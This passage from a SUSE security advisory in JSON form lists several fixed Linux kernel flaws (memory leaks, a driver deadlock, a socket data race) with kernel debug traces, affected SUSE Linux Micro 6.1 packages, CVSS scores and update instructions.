"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: TC, Fix internal port memory leak\n\nThe flow rule can be splited, and the extra post_act rules are added\nto post_act table. It\u0027s possible to trigger memleak when the rule\nforwards packets from internal port and over tunnel, in the case that,\nfor example, CT \u0027new\u0027 state offload is allowed. As int_port object is\nassigned to the flow attribute of post_act rule, and its refcnt is\nincremented by mlx5e_tc_int_port_get(), but mlx5e_tc_int_port_put() is\nnot called, the refcnt is never decremented, then int_port is never\nfreed.\n\nThe kmemleak reports the following error:\nunreferenced object 0xffff888128204b80 (size 64):\n comm \"handler20\", pid 50121, jiffies 4296973009 (age 642.932s)\n hex dump (first 32 bytes):\n 01 00 00 00 19 00 00 00 03 f0 00 00 04 00 00 00 ................\n 98 77 67 41 81 88 ff ff 98 77 67 41 81 88 ff ff .wgA.....wgA....\n backtrace:\n [\u003c00000000e992680d\u003e] kmalloc_trace+0x27/0x120\n [\u003c000000009e945a98\u003e] mlx5e_tc_int_port_get+0x3f3/0xe20 [mlx5_core]\n [\u003c0000000035a537f0\u003e] mlx5e_tc_add_fdb_flow+0x473/0xcf0 [mlx5_core]\n [\u003c0000000070c2cec6\u003e] __mlx5e_add_fdb_flow+0x7cf/0xe90 [mlx5_core]\n [\u003c000000005cc84048\u003e] mlx5e_configure_flower+0xd40/0x4c40 [mlx5_core]\n [\u003c000000004f8a2031\u003e] mlx5e_rep_indr_offload.isra.0+0x10e/0x1c0 [mlx5_core]\n [\u003c000000007df797dc\u003e] mlx5e_rep_indr_setup_tc_cb+0x90/0x130 [mlx5_core]\n [\u003c0000000016c15cc3\u003e] tc_setup_cb_add+0x1cf/0x410\n [\u003c00000000a63305b4\u003e] fl_hw_replace_filter+0x38f/0x670 [cls_flower]\n [\u003c000000008bc9e77c\u003e] fl_change+0x1fd5/0x4430 [cls_flower]\n [\u003c00000000e7f766e4\u003e] tc_new_tfilter+0x867/0x2010\n [\u003c00000000e101c0ef\u003e] rtnetlink_rcv_msg+0x6fc/0x9f0\n [\u003c00000000e1111d44\u003e] netlink_rcv_skb+0x12c/0x360\n [\u003c0000000082dd6c8b\u003e] netlink_unicast+0x438/0x710\n [\u003c00000000fc568f70\u003e] netlink_sendmsg+0x794/0xc50\n [\u003c0000000016e92590\u003e] sock_sendmsg+0xc5/0x190\n\nSo fix this by moving int_port cleanup code to the flow attribute\nfree helper, which is used by all the attribute free cases.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53999",
"url": "https://www.suse.com/security/cve/CVE-2023-53999"
},
{
"category": "external",
"summary": "SUSE Bug 1255621 for CVE-2023-53999",
"url": "https://bugzilla.suse.com/1255621"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53999"
},
{
"cve": "CVE-2023-54000",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54000"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: fix deadlock issue when externel_lb and reset are executed together\n\nWhen externel_lb and reset are executed together, a deadlock may\noccur:\n[ 3147.217009] INFO: task kworker/u321:0:7 blocked for more than 120 seconds.\n[ 3147.230483] \"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n[ 3147.238999] task:kworker/u321:0 state:D stack: 0 pid: 7 ppid: 2 flags:0x00000008\n[ 3147.248045] Workqueue: hclge hclge_service_task [hclge]\n[ 3147.253957] Call trace:\n[ 3147.257093] __switch_to+0x7c/0xbc\n[ 3147.261183] __schedule+0x338/0x6f0\n[ 3147.265357] schedule+0x50/0xe0\n[ 3147.269185] schedule_preempt_disabled+0x18/0x24\n[ 3147.274488] __mutex_lock.constprop.0+0x1d4/0x5dc\n[ 3147.279880] __mutex_lock_slowpath+0x1c/0x30\n[ 3147.284839] mutex_lock+0x50/0x60\n[ 3147.288841] rtnl_lock+0x20/0x2c\n[ 3147.292759] hclge_reset_prepare+0x68/0x90 [hclge]\n[ 3147.298239] hclge_reset_subtask+0x88/0xe0 [hclge]\n[ 3147.303718] hclge_reset_service_task+0x84/0x120 [hclge]\n[ 3147.309718] hclge_service_task+0x2c/0x70 [hclge]\n[ 3147.315109] process_one_work+0x1d0/0x490\n[ 3147.319805] worker_thread+0x158/0x3d0\n[ 3147.324240] kthread+0x108/0x13c\n[ 3147.328154] ret_from_fork+0x10/0x18\n\nIn externel_lb process, the hns3 driver call napi_disable()\nfirst, then the reset happen, then the restore process of the\nexternel_lb will fail, and will not call napi_enable(). When\ndoing externel_lb again, napi_disable() will be double call,\ncause a deadlock of rtnl_lock().\n\nThis patch use the HNS3_NIC_STATE_DOWN state to protect the\ncalling of napi_disable() and napi_enable() in externel_lb\nprocess, just as the usage in ndo_stop() and ndo_start().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54000",
"url": "https://www.suse.com/security/cve/CVE-2023-54000"
},
{
"category": "external",
"summary": "SUSE Bug 1255564 for CVE-2023-54000",
"url": "https://bugzilla.suse.com/1255564"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54000"
},
{
"cve": "CVE-2023-54001",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54001"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: r8712: Fix memory leak in _r8712_init_xmit_priv()\n\nIn the above mentioned routine, memory is allocated in several places.\nIf the first succeeds and a later one fails, the routine will leak memory.\nThis patch fixes commit 2865d42c78a9 (\"staging: r8712u: Add the new driver\nto the mainline kernel\"). A potential memory leak in\nr8712_xmit_resource_alloc() is also addressed.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54001",
"url": "https://www.suse.com/security/cve/CVE-2023-54001"
},
{
"category": "external",
"summary": "SUSE Bug 1255628 for CVE-2023-54001",
"url": "https://bugzilla.suse.com/1255628"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54001"
},
{
"cve": "CVE-2023-54005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54005"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbinder: fix memory leak in binder_init()\n\nIn binder_init(), the destruction of binder_alloc_shrinker_init() is not\nperformed in the wrong path, which will cause memory leaks. So this commit\nintroduces binder_alloc_shrinker_exit() and calls it in the wrong path to\nfix that.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54005",
"url": "https://www.suse.com/security/cve/CVE-2023-54005"
},
{
"category": "external",
"summary": "SUSE Bug 1255629 for CVE-2023-54005",
"url": "https://bugzilla.suse.com/1255629"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54005"
},
{
"cve": "CVE-2023-54006",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54006"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\naf_unix: Fix data-race around unix_tot_inflight.\n\nunix_tot_inflight is changed under spin_lock(unix_gc_lock), but\nunix_release_sock() reads it locklessly.\n\nLet\u0027s use READ_ONCE() for unix_tot_inflight.\n\nNote that the writer side was marked by commit 9d6d7f1cb67c (\"af_unix:\nannote lockless accesses to unix_tot_inflight \u0026 gc_in_progress\")\n\nBUG: KCSAN: data-race in unix_inflight / unix_release_sock\n\nwrite (marked) to 0xffffffff871852b8 of 4 bytes by task 123 on cpu 1:\n unix_inflight+0x130/0x180 net/unix/scm.c:64\n unix_attach_fds+0x137/0x1b0 net/unix/scm.c:123\n unix_scm_to_skb net/unix/af_unix.c:1832 [inline]\n unix_dgram_sendmsg+0x46a/0x14f0 net/unix/af_unix.c:1955\n sock_sendmsg_nosec net/socket.c:724 [inline]\n sock_sendmsg+0x148/0x160 net/socket.c:747\n ____sys_sendmsg+0x4e4/0x610 net/socket.c:2493\n ___sys_sendmsg+0xc6/0x140 net/socket.c:2547\n __sys_sendmsg+0x94/0x140 net/socket.c:2576\n __do_sys_sendmsg net/socket.c:2585 [inline]\n __se_sys_sendmsg net/socket.c:2583 [inline]\n __x64_sys_sendmsg+0x45/0x50 net/socket.c:2583\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x72/0xdc\n\nread to 0xffffffff871852b8 of 4 bytes by task 4891 on cpu 0:\n unix_release_sock+0x608/0x910 net/unix/af_unix.c:671\n unix_release+0x59/0x80 net/unix/af_unix.c:1058\n __sock_release+0x7d/0x170 net/socket.c:653\n sock_close+0x19/0x30 net/socket.c:1385\n __fput+0x179/0x5e0 fs/file_table.c:321\n ____fput+0x15/0x20 fs/file_table.c:349\n task_work_run+0x116/0x1a0 kernel/task_work.c:179\n resume_user_mode_work include/linux/resume_user_mode.h:49 [inline]\n exit_to_user_mode_loop kernel/entry/common.c:171 [inline]\n exit_to_user_mode_prepare+0x174/0x180 kernel/entry/common.c:204\n __syscall_exit_to_user_mode_work kernel/entry/common.c:286 [inline]\n syscall_exit_to_user_mode+0x1a/0x30 kernel/entry/common.c:297\n do_syscall_64+0x4b/0x90 arch/x86/entry/common.c:86\n entry_SYSCALL_64_after_hwframe+0x72/0xdc\n\nvalue changed: 0x00000000 -\u003e 0x00000001\n\nReported by Kernel Concurrency Sanitizer on:\nCPU: 0 PID: 4891 Comm: systemd-coredum Not tainted 6.4.0-rc5-01219-gfa0e21fa4443 #5\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54006",
